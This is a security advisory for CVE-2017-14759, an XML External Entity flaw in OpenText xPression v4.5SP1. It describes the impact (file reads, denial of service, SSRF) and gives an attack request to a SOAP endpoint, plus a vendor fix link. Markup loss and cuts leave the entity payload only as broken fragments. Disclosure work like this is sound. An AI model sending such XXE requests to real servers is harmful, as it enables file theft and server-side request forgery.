Title: OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) - XML External Entity Author: Marcin Woloszyn Date: 27. September 2017 CVE: CVE-2017-14759 Affected Software: ================== OpenText Document Sciences xPression (formerly EMC Document Sciences xPression) Exploit was tested on: ====================== v4.5SP1 Patch 13 (older versions might be affected as well) XML External Entity: ==================== Application XML parser is accepting DOCTYPE in provided XML documents either directly or indirectly, using URL. This can be exploited in various of ways, e.g. to read directory listings, read system or application files, cause denial of service or issue requests on behalf of server (SSRF). Vector : -------- POST /xFramework/services/QuickDoc.QuickDocHttpSoap11Endpoint/ HTTP/1.1 Accept-Encoding: gzip,deflate Content-Type: text/xml;charset=UTF-8 SOAPAction: "urn:publishDocument" Content-Length: 13689 Host: [...cut...] User-Agent: Apache-HttpClient/4.1.1 (java 1.5) Connection: close %r; %i; %t; ]> [...cut...] [...cut...] ELease ]]> [...cut...] Final [...cut...] ]]> PDF w Draftwatermark to File Fix: ==== https://knowledge.opentext.com/knowledge/llisapi.dll/Open/68982774 Contact: ======== mw[at]nme[dot]pl